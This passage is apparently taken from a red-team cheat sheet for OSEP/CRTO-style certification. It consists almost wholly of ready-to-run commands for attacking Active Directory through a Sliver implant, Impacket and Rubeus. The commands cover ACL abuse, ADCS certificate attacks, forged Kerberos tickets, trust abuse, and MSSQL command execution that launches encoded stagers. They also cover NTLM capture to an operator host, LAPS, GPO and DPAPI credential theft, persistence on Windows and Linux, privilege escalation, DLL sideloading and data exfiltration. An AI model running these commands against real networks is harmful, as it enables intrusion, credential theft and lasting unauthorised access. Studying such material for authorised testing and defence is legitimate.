sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainObject -Identity <TARGET_USER> -Clear serviceprincipalname

# GenericWrite on a COMPUTER → RBCD / write msDS-AllowedToActOnBehalfOfOtherIdentity
# (Same flow as RBCD in Kerberos section)

# From Linux — set SPN for targeted Kerberoasting
$ proxychains python3 targetedKerberoast.py -d <DOMAIN> -u <USER> -p '<PASS>' --dc-ip <DC_IP>

WriteDACL

# WriteDACL → modify the ACL itself; grant yourself GenericAll first, then abuse
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Add-DomainObjectAcl -TargetIdentity <TARGET> -PrincipalIdentity <CURRENT_USER> -Rights All

# From Linux (Impacket dacledit.py)
$ proxychains dacledit.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -target '<TARGET_DN>' -action write -rights FullControl -principal <CURRENT_USER>

# Now use GenericAll techniques above
# Clean up: remove the ACE after exploitation
$ proxychains dacledit.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -target '<TARGET_DN>' -action remove -rights FullControl -principal <CURRENT_USER>

WriteOwner

# WriteOwner → take ownership, then WriteDACL → GenericAll → abuse
# Take ownership of the target object
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainObjectOwner -Identity <TARGET> -OwnerIdentity <CURRENT_USER>

# From Linux
$ proxychains owneredit.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -target '<TARGET_DN>' -new-owner <CURRENT_USER> -action write

# Now WriteDACL to grant yourself rights, then abuse

ForceChangePassword

# ForceChangePassword right → change target's password without knowing current
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword 'NewP@ss123!'

# From Linux
$ proxychains net rpc password <TARGET_USER> 'NewP@ss123!' -U '<DOMAIN>/<CURRENT_USER>%<CURRENT_PASS>' -S <DC_IP>

AddMember (on a Group)

# Self / AddMember on a group → add any user to the group
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Add-DomainGroupMember -Identity "<TARGET_GROUP>" -Members <USER_TO_ADD>

# From Linux
$ proxychains net rpc group addmem "<TARGET_GROUP>" <USER_TO_ADD> -U '<DOMAIN>/<CURRENT_USER>%<PASS>' -S <DC_IP>

Practical Attack Chain (Common OSEP Pattern)

# 1. Run BloodHound, find: User1 --GenericWrite--> User2 --ForceChangePassword--> AdminUser
# 2. As User1, set SPN on User2 and Kerberoast for the password
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainObject -Identity User2 -Set @{serviceprincipalname='fake/svc'}
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe kerberoast /user:User2 /nowrap
# Crack hash offline → get User2's password
# 3. Impersonate User2, force-change AdminUser's password
sliver (IMPLANT) > make-token -u User2 -d <DOMAIN> -p '<CRACKED_PASS>'
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainUserPassword -Identity AdminUser -AccountPassword 'Pwned123!'
# 4. Use AdminUser's new password for lateral movement

Active Directory Certificate Services (ADCS)

Theory

ADCS misconfigurations allow privilege escalation by requesting certificates on behalf of other users, or relaying authentication to the CA's web endpoint.

Enumeration

# From Sliver (Certify)
sliver (IMPLANT) > execute-assembly /tools/Certify.exe cas
sliver (IMPLANT) > execute-assembly /tools/Certify.exe find /vulnerable

# From Linux (Certipy)
$ proxychains certipy find -u <USER>@<DOMAIN> -p '<PASS>' -dc-ip <DC_IP> -vulnerable

ESC1 — ENROLLEE_SUPPLIES_SUBJECT

# Request certificate as another user (e.g., Domain Admin)
sliver (IMPLANT) > execute-assembly /tools/Certify.exe request /ca:<CA_HOSTNAME>\<CA_NAME> /template:<VULN_TEMPLATE> /altname:<TARGET_USER>

# Convert the PEM certificate to PFX
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Use certificate to get a TGT
$ cat cert.pfx | base64 -w 0
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:<TARGET_USER> /certificate:<BASE64_PFX> /password:<PFX_PASSWORD> /nowrap

# From Linux (Certipy)
$ proxychains certipy req -u <USER>@<DOMAIN> -p '<PASS>' -ca <CA_NAME> -template <TEMPLATE> -upn <TARGET_USER>@<DOMAIN>
$ proxychains certipy auth -pfx <TARGET_USER>.pfx -dc-ip <DC_IP>

ESC8 — NTLM Relay to ADCS HTTP Endpoint

# 1. Start SOCKS proxy on Sliver implant
sliver (IMPLANT) > socks5 start

# 2. Configure reverse port forwarding for SMB capture
sliver (IMPLANT) > rportfwd add --bind 0.0.0.0:445 --remote 127.0.0.1:445

# 3. Run ntlmrelayx targeting the CA web enrollment endpoint
$ proxychains impacket-ntlmrelayx -t http://<CA_IP>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

# 4. Coerce authentication (PrinterBug/PetitPotam)
$ proxychains python3 PetitPotam.py <COMPROMISED_HOST_IP> <DC_IP>

# 5. Use obtained certificate
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:<DC_MACHINE$> /certificate:<BASE64_CERT> /nowrap

Domain Dominance

Golden Ticket

# 1. Get krbtgt hash (via DCSync or from DC)
$ proxychains impacket-secretsdump <DOMAIN>/<ADMIN>:'<PASS>'@<DC_IP> -just-dc-user krbtgt

# 2. Generate Golden Ticket (offline — Rubeus)
$ Rubeus.exe golden /aes256:<KRBTGT_AES256> /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /nowrap

# 3. From Linux (Impacket ticketer)
$ impacket-ticketer -nthash <KRBTGT_NTLM> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator
$ export KRB5CCNAME=Administrator.ccache
$ proxychains impacket-psexec -k -no-pass <DC_FQDN>

Silver Ticket

# 1. Get the target service account's hash (machine account or service account)
# e.g., via DCSync for the machine account

# 2. Generate Silver Ticket
$ Rubeus.exe silver /service:cifs/<TARGET_FQDN> /aes256:<MACHINE_AES256> /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /nowrap

# 3. Inject and access
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:Administrator /password:FakePass /ticket:<BASE64_TICKET>

Diamond Ticket

# Modifies a legitimate TGT — harder to detect than Golden Ticket
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:<KRBTGT_AES256> /nowrap

Forged Certificates

# 1. Extract CA private key from DC/CA server
sliver (IMPLANT) > execute-assembly /tools/SharpDPAPI.exe certificates /machine

# 2. Save cert as PEM, convert to PFX
$ openssl pkcs12 -in ca-cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ca.pfx

# 3. Forge a certificate for any user
$ ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword pass --Subject "CN=User" --SubjectAltName "administrator@<DOMAIN>" --NewCertPath forged.pfx --NewCertPassword pass

# 4. Use forged cert to get TGT
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:Administrator /domain:<DOMAIN> /certificate:<BASE64_FORGED_PFX> /password:pass /nowrap

Forest & Domain Trust Abuse

Child → Parent (SID History)

# 1. Get krbtgt hash of child domain
$ proxychains impacket-secretsdump <CHILD_DOMAIN>/<ADMIN>:'<PASS>'@<CHILD_DC_IP> -just-dc-user krbtgt

# 2. Get Enterprise Admins SID from parent domain
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainGroup -Identity "Enterprise Admins" -Domain <PARENT_DOMAIN> -Properties ObjectSid

# 3. Golden Ticket with SID History (/sids flag)
$ Rubeus.exe golden /aes256:<CHILD_KRBTGT_AES256> /user:Administrator /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /sids:<PARENT_EA_SID> /nowrap

# 4. Diamond Ticket variant
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:<PARENT_EA_SID> /krbkey:<CHILD_KRBTGT_AES256> /nowrap

# From Linux:
$ impacket-ticketer -nthash <CHILD_KRBTGT_NTLM> -domain-sid <CHILD_SID> -domain <CHILD_DOMAIN> -extra-sid <PARENT_EA_SID> Administrator

Inbound Trust Exploitation

# Users in OUR domain can access resources in FOREIGN domain

# 1. Enumerate cross-domain group memberships
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainForeignGroupMember -Domain <FOREIGN_DOMAIN>

# 2. Get the user's hash who has access
$ proxychains impacket-secretsdump <OUR_DOMAIN>/<ADMIN>:'<PASS>'@<OUR_DC_IP> -just-dc-user <USER>

# 3. Get Inter-Realm TGT
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:<USER> /domain:<OUR_DOMAIN> /aes256:<USER_AES256> /nowrap

# 4. Request cross-realm TGS
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgs /service:krbtgt/<FOREIGN_DOMAIN> /domain:<OUR_DOMAIN> /dc:<OUR_DC_FQDN> /ticket:<BASE64_TGT> /nowrap

# 5. Request service ticket in foreign domain
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgs /service:cifs/<FOREIGN_DC_FQDN> /domain:<FOREIGN_DOMAIN> /dc:<FOREIGN_DC_FQDN> /ticket:<BASE64_CROSS_TGT> /nowrap

Outbound Trust Exploitation

# Users in FOREIGN domain can access resources in OUR domain
# We can impersonate the trust account (FOREIGN$) in their domain

# 1. Extract TDO (Trusted Domain Object) hash
$ proxychains impacket-secretsdump <OUR_DOMAIN>/<ADMIN>:'<PASS>'@<OUR_DC_IP> -just-dc-user '<FOREIGN_DOMAIN>$'

# 2. Get TGT for the trust account
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:<OUR_NETBIOS>$ /domain:<FOREIGN_DOMAIN> /rc4:<TDO_NTLM> /nowrap

# 3. Enumerate foreign domain with trust account access
# (Low-priv enum — find further attack paths)

MSSQL Server Attacks

# --- Enumeration (via Sliver SOCKS) ---
$ proxychains impacket-mssqlclient -windows-auth <DOMAIN>/<USER>:'<PASS>'@<SQL_IP>

# Or from implant using PowerUpSQL
sliver (IMPLANT) > execute-assembly /tools/PowerUpSQL.dll
# (or use PowerShell)
PS> Import-Module PowerUpSQL.ps1
PS> Get-SQLInstanceDomain
PS> Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" }

# --- Command Execution via xp_cmdshell ---
SQL> SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
SQL> sp_configure 'Show Advanced Options', 1; RECONFIGURE;
SQL> sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami';

# Execute Sliver stager
SQL> EXEC xp_cmdshell 'powershell -nop -w hidden -enc <BASE64_PAYLOAD>';

# --- Linked Server Enumeration ---
SQL> SELECT * FROM master..sysservers;
SQL> SELECT * FROM OPENQUERY("sql-1.domain.com", 'select @@servername');

# Enable xp_cmdshell on linked server
SQL> EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.domain.com]
SQL> EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.domain.com]
SQL> EXEC('xp_cmdshell ''powershell -enc <BASE64>''') AT [sql-1.domain.com]

# --- PrivEsc: SeImpersonate → SYSTEM ---
# SQL Server service accounts typically have SeImpersonatePrivilege
# Use PrintSpoofer, GodPotato, or SweetPotato (same as earlier PrivEsc section)

# --- UNC Path Injection (NTLM Hash Capture) ---
# Force the SQL Server service account to authenticate to your listener
# The service account's NTLMv2 hash is captured for offline cracking

# Start Responder or ntlmrelayx on operator
$ sudo responder -I eth0
# Or relay directly to another target
$ sudo ntlmrelayx.py -t <TARGET_IP> -smb2support

# Trigger outbound auth from SQL Server using xp_dirtree
SQL> EXEC xp_dirtree '\\<OPERATOR_IP>\share', 1, 1;

# Alternative: xp_fileexist (also triggers SMB auth)
SQL> EXEC xp_fileexist '\\<OPERATOR_IP>\share\file.txt';

# Alternative: OPENROWSET (if enabled)
SQL> SELECT * FROM OPENROWSET('SQLNCLI', 'Server=\\<OPERATOR_IP>\share;', 'SELECT 1');

# If SQL service runs as a domain account, crack the captured NTLMv2 hash
$ hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt

# Relay scenario: relay the SQL service account's auth to another host
# ntlmrelayx can relay to SMB, LDAP, MSSQL, HTTP, etc.
$ sudo ntlmrelayx.py -t smb://<OTHER_TARGET> -smb2support -c 'powershell -enc <SLIVER_STAGER>'

LAPS Abuse

# Check if LAPS is deployed
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainComputer -Properties ms-Mcs-AdmPwdExpirationTime | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null }

# Find who can read LAPS passwords
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" }

# Read the LAPS password (from a user/session with rights)
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainComputer -Identity <HOST> -Properties ms-Mcs-AdmPwd

# Use the password
sliver (IMPLANT) > make-token -u .\LapsAdmin -d . -p '<LAPS_PASSWORD>'

# From Linux
$ proxychains netexec smb <TARGET_IP> -u LapsAdmin -p '<LAPS_PASSWORD>' --local-auth
$ proxychains impacket-psexec ./LapsAdmin:'<LAPS_PASSWORD>'@<TARGET_IP>

# LAPS persistence: set far-future expiry
PS> Set-DomainObject -Identity <HOST> -Set @{'ms-Mcs-AdmPwdExpirationTime' = '136257686710000000'}

Group Policy Abuse

# 1. Find GPOs where current user has modify rights
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" }

# 2. Identify which OUs the GPO applies to
PS> Get-DomainOU -GPLink "{<GPO_GUID>}" | select distinguishedName

# 3. Abuse with SharpGPOAbuse (add scheduled task)
sliver (IMPLANT) > execute-assembly /tools/SharpGPOAbuse.exe --AddComputerTask --TaskName "Updater" --Author "NT AUTHORITY\SYSTEM" --Command "C:\Windows\System32\cmd.exe" --Arguments "/c C:\Windows\Temp\sliver.exe" --GPOName "<GPO_NAME>"

# 4. Force GPO update (or wait)
cmd> gpupdate /force

# From Linux (pyGPOAbuse)
$ proxychains python3 pygpoabuse.py <DOMAIN>/<USER>:'<PASS>' -gpo-id "<GPO_ID>" -dc-ip <DC_IP>

Data Protection API (DPAPI)

# Dump Windows Vault
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "vault::list"

# Scheduled task credentials
sliver (IMPLANT) > shell
cmd> dir C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

# Find credential blob details (GUID of master key)
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<BLOB_FILE>"

# Dump master keys from LSASS
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "sekurlsa::dpapi"

# Decrypt credential blob with master key
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "dpapi::cred /in:<BLOB_PATH> /masterkey:<KEY>"

# SharpDPAPI (better for full automation)
sliver (IMPLANT) > execute-assembly /tools/SharpDPAPI.exe triage
sliver (IMPLANT) > execute-assembly /tools/SharpDPAPI.exe credentials /target:C:\Users\<USER>\AppData\Local\Microsoft\Credentials

Persistence Mechanisms

Windows (Userland)

# --- Registry Autorun ---
sliver (IMPLANT) > shell
cmd> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\<USER>\AppData\Local\updater.exe" /f

# --- Scheduled Task ---
cmd> schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\sliver.exe" /sc hourly /ru SYSTEM

# --- Startup Folder ---
sliver (IMPLANT) > upload /tmp/sliver.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"

# --- COM Hijack ---
cmd> reg add "HKCU\Software\Classes\CLSID\{<HIJACKABLE_CLSID>}\InprocServer32" /ve /t REG_SZ /d "C:\Users\<USER>\AppData\Local\evil.dll" /f
cmd> reg add "HKCU\Software\Classes\CLSID\{<HIJACKABLE_CLSID>}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Both" /f

Windows (Privileged — Requires SYSTEM/Admin)

# --- Windows Service ---
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format service --save /tmp/svc.exe
sliver (IMPLANT) > upload /tmp/svc.exe C:\Windows\legit-svc.exe
sliver (IMPLANT) > shell
cmd> sc create LegitSvc binPath= "C:\Windows\legit-svc.exe" start= auto
cmd> sc start LegitSvc

# --- WMI Event Subscription ---
# PowerLurk for WMI persistence
PS> Import-Module PowerLurk.ps1
PS> Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\sliver.exe" -Trigger ProcessStart -ProcessName notepad.exe

# --- Golden Ticket / Certificate persistence (see Domain Dominance section) ---

Linux Persistence

# --- Cron Job ---
$ echo "*/5 * * * * /tmp/.cache/sliver" | crontab -

# --- Systemd Service ---
$ cat > /etc/systemd/system/updater.service << EOF
[Unit]
Description=System Updater
After=network.target

[Service]
Type=simple
ExecStart=/opt/.cache/sliver
Restart=always

[Install]
WantedBy=multi-user.target
EOF
$ systemctl daemon-reload
$ systemctl enable updater.service
$ systemctl start updater.service

# --- SSH Authorized Keys ---
$ echo "<YOUR_PUBLIC_KEY>" >> ~/.ssh/authorized_keys

# --- bashrc/profile ---
$ echo "/tmp/.cache/sliver &" >> ~/.bashrc

Linux Privilege Escalation

Enumeration

# LinPEAS
sliver (IMPLANT) > upload /tools/linpeas.sh /tmp/linpeas.sh
sliver (IMPLANT) > shell
$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh

# Manual checks
$ id
$ sudo -l                          # sudo misconfigurations
$ find / -perm -4000 2>/dev/null   # SUID binaries
$ find / -perm -2000 2>/dev/null   # SGID binaries
$ cat /etc/crontab                 # cron jobs
$ ls -la /etc/cron*
$ getcap -r / 2>/dev/null          # capabilities
$ cat /etc/passwd | grep -v nologin
$ ls -la /etc/shadow               # readable shadow file?
$ env                              # environment variables
$ ps auxww                         # running processes
$ ss -tlnp                         # listening services
$ find / -writable -type d 2>/dev/null  # writable directories
$ dpkg -l 2>/dev/null              # installed packages (Debian)
$ rpm -qa 2>/dev/null              # installed packages (RHEL)

Common Privesc Vectors

# --- SUID Binary Abuse ---
# Check GTFOBins for exploitable SUID binaries
# Example: /usr/bin/find with SUID
$ /usr/bin/find . -exec /bin/sh -p \;

# --- Sudo Misconfig ---
# If sudo -l shows (ALL) NOPASSWD: /usr/bin/vim
$ sudo vim -c ':!bash'

# --- Writable /etc/passwd ---
$ openssl passwd -1 -salt hacker password123
$ echo 'hacker:<HASH>:0:0::/root:/bin/bash' >> /etc/passwd

# --- Kernel Exploits ---
$ uname -r   # check kernel version
# Search exploit-db / searchsploit for matching exploits
$ searchsploit linux kernel <VERSION> privilege escalation

# --- Capabilities ---
# If python3 has cap_setuid
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# --- Cron / PATH hijack ---
# If cron runs a script that calls a binary without full path
# Create malicious binary in a writable directory that's earlier in PATH

.NET Assembly Execution In-Memory

Theory

Sliver's execute-assembly command loads a .NET assembly into memory without dropping it to disk. This is equivalent to Cobalt Strike's execute-assembly. Behind the scenes, it spawns a sacrificial process and uses CLR hosting to run the assembly.

# Run any .NET assembly in-memory
sliver (IMPLANT) > execute-assembly /path/to/Tool.exe [arguments]

# Examples:
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe kerberoast /nowrap
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe -group=all
sliver (IMPLANT) > execute-assembly /tools/SharpHound.exe -c All
sliver (IMPLANT) > execute-assembly /tools/Certify.exe find /vulnerable
sliver (IMPLANT) > execute-assembly /tools/SharpDPAPI.exe triage
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "objectCategory=user"

# Convert any .NET tool to shellcode with Donut for use in custom loaders
$ ./donut -i Rubeus.exe -a 2 -p "kerberoast /nowrap" -o rubeus.bin

Reflective DLL Injection & DLL Sideloading

Theory

Reflective DLL Injection: Load a DLL into a process's memory without using LoadLibrary (which is monitored). The DLL contains a reflective loader that maps itself.

DLL Sideloading: Abuse a legitimate application's DLL search order to load a malicious DLL. Place your DLL where the app looks before the real one.

DLL Hijacking: Replace or intercept a DLL that a running service/app loads.

Sliver Commands

# Sideload a DLL into the implant process (reflective load)
sliver (IMPLANT) > sideload /path/to/payload.dll [EntryPoint] [args]

# Sideload with specific entry point
sliver (IMPLANT) > sideload /path/to/mimikatz.dll Main "sekurlsa::logonpasswords"

# Execute a Windows DLL export function
sliver (IMPLANT) > execute-dll /path/to/payload.dll ExportFunc

DLL Sideloading Attack Flow

# 1. Find a signed/trusted EXE that side-loads a DLL
# Common targets: OneDrive, Teams, various vendor apps
# Use SigFlip, Procmon, or known sideloading opportunities

# 2. Generate a Sliver DLL
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format shared --save /tmp/payload.dll

# 3. Rename DLL to match what the legitimate EXE expects
$ cp /tmp/payload.dll /tmp/version.dll

# 4. Upload both the legitimate EXE and malicious DLL
sliver (IMPLANT) > upload /tmp/legit_app.exe C:\Windows\Temp\legit_app.exe
sliver (IMPLANT) > upload /tmp/version.dll C:\Windows\Temp\version.dll

# 5. Execute the legitimate EXE — it loads your DLL
sliver (IMPLANT) > execute C:\Windows\Temp\legit_app.exe

Data Exfiltration

# --- File Discovery ---
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Find-DomainShare -CheckShareAccess
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Find-InterestingDomainShareFile -Include *.doc*,*.xls*,*.csv,*.ppt*

# --- Download files ---
sliver (IMPLANT) > download C:\Users\admin\Desktop\secrets.xlsx
sliver (IMPLANT) > download C:\Shares\finance\export.csv

# --- Search file contents ---
sliver (IMPLANT) > shell
cmd> findstr /S /I "password" C:\Users\*.txt C:\Users\*.xml C:\Users\*.ini C:\Users\*.config
cmd> findstr /S /I "credential" \\<SERVER>\share$\*.xml

# --- Database exfil (via SOCKS + Impacket) ---
$ proxychains impacket-mssqlclient <DOMAIN>/<USER>:'<PASS>'@<SQL_IP>
SQL> SELECT * FROM master.dbo.sensitive_table;

# --- Compress for exfil ---
sliver (IMPLANT) > shell
PS> Compress-Archive -Path C:\Shares\finance -DestinationPath C:\Windows\Temp\data.zip
sliver (IMPLANT) > download C:\Windows\Temp\data.zip

Quick Reference — Tool Locations & Equivalents

CRTO (Cobalt Strike)OSEP (Sliver) Equivalent
beacon> shellsliver> shell
beacon> execute-assemblysliver> execute-assembly
beacon> powershell-importUpload + execute in shell, or use BOF
beacon> powerpicksliver> execute-assembly with PowerSharpPack, or BOF
beacon> pthsliver> make-token / Impacket PTH
beacon> steal_tokensliver> impersonate / execute-assembly SharpToken
beacon> rev2selfsliver> rev2self
beacon> dcsyncexecute-assembly SharpKatz / Impacket secretsdump
beacon> mimikatzexecute-assembly SafetyKatz / SharpKatz / BOF
beacon> jump psexecImpacket psexec / manual sc
beacon> jump winrmEvil-WinRM / PS New-PSSession
beacon> sockssliver> socks5 start
beacon> rportfwdsliver> rportfwd add
beacon> connectsliver> pivots tcp
beacon> linksliver> pivots tcp (named pipe not needed)
beacon> injectsliver> execute-shellcode -p <PID>
beacon> shinjectsliver> execute-shellcode
beacon> shspawnsliver> execute-shellcode (new process)
beacon> upload / downloadsliver> upload / download
beacon> screenshotsliver> screenshot
beacon> keyloggerBOF or upload keylogger
Artifact KitDonut + custom loaders
Malleable C2 ProfileSliver HTTP C2 profiles (JSON)
Aggressor Scripts (.cna)Sliver extensions / armory

Essential .NET Tools to Pre-Compile

Keep these ready as both EXE (for execute-assembly) and BIN (via Donut for custom loaders):

ToolPurpose
RubeusKerberos attacks (roasting, delegation, ticket ops)
CertifyADCS enumeration and certificate requests
SeatbeltHost and security enumeration
SharpUpWindows privesc checks
SharpHoundBloodHound data collection
ADSearchLightweight AD LDAP queries
SharpViewC# port of PowerView
SharpDPAPIDPAPI credential extraction
SharpKatz / SafetyKatzC# mimikatz (credential dumping)
SharpSecDumpRemote SAM/LSA/cached cred dump
StandInMachine account operations (RBCD)
SharpGPOAbuseGPO-based attacks
SweetPotatoToken impersonation privesc
PrintSpooferSeImpersonate to SYSTEM
SharpTokenToken manipulation
ForgeCertCA certificate forgery

References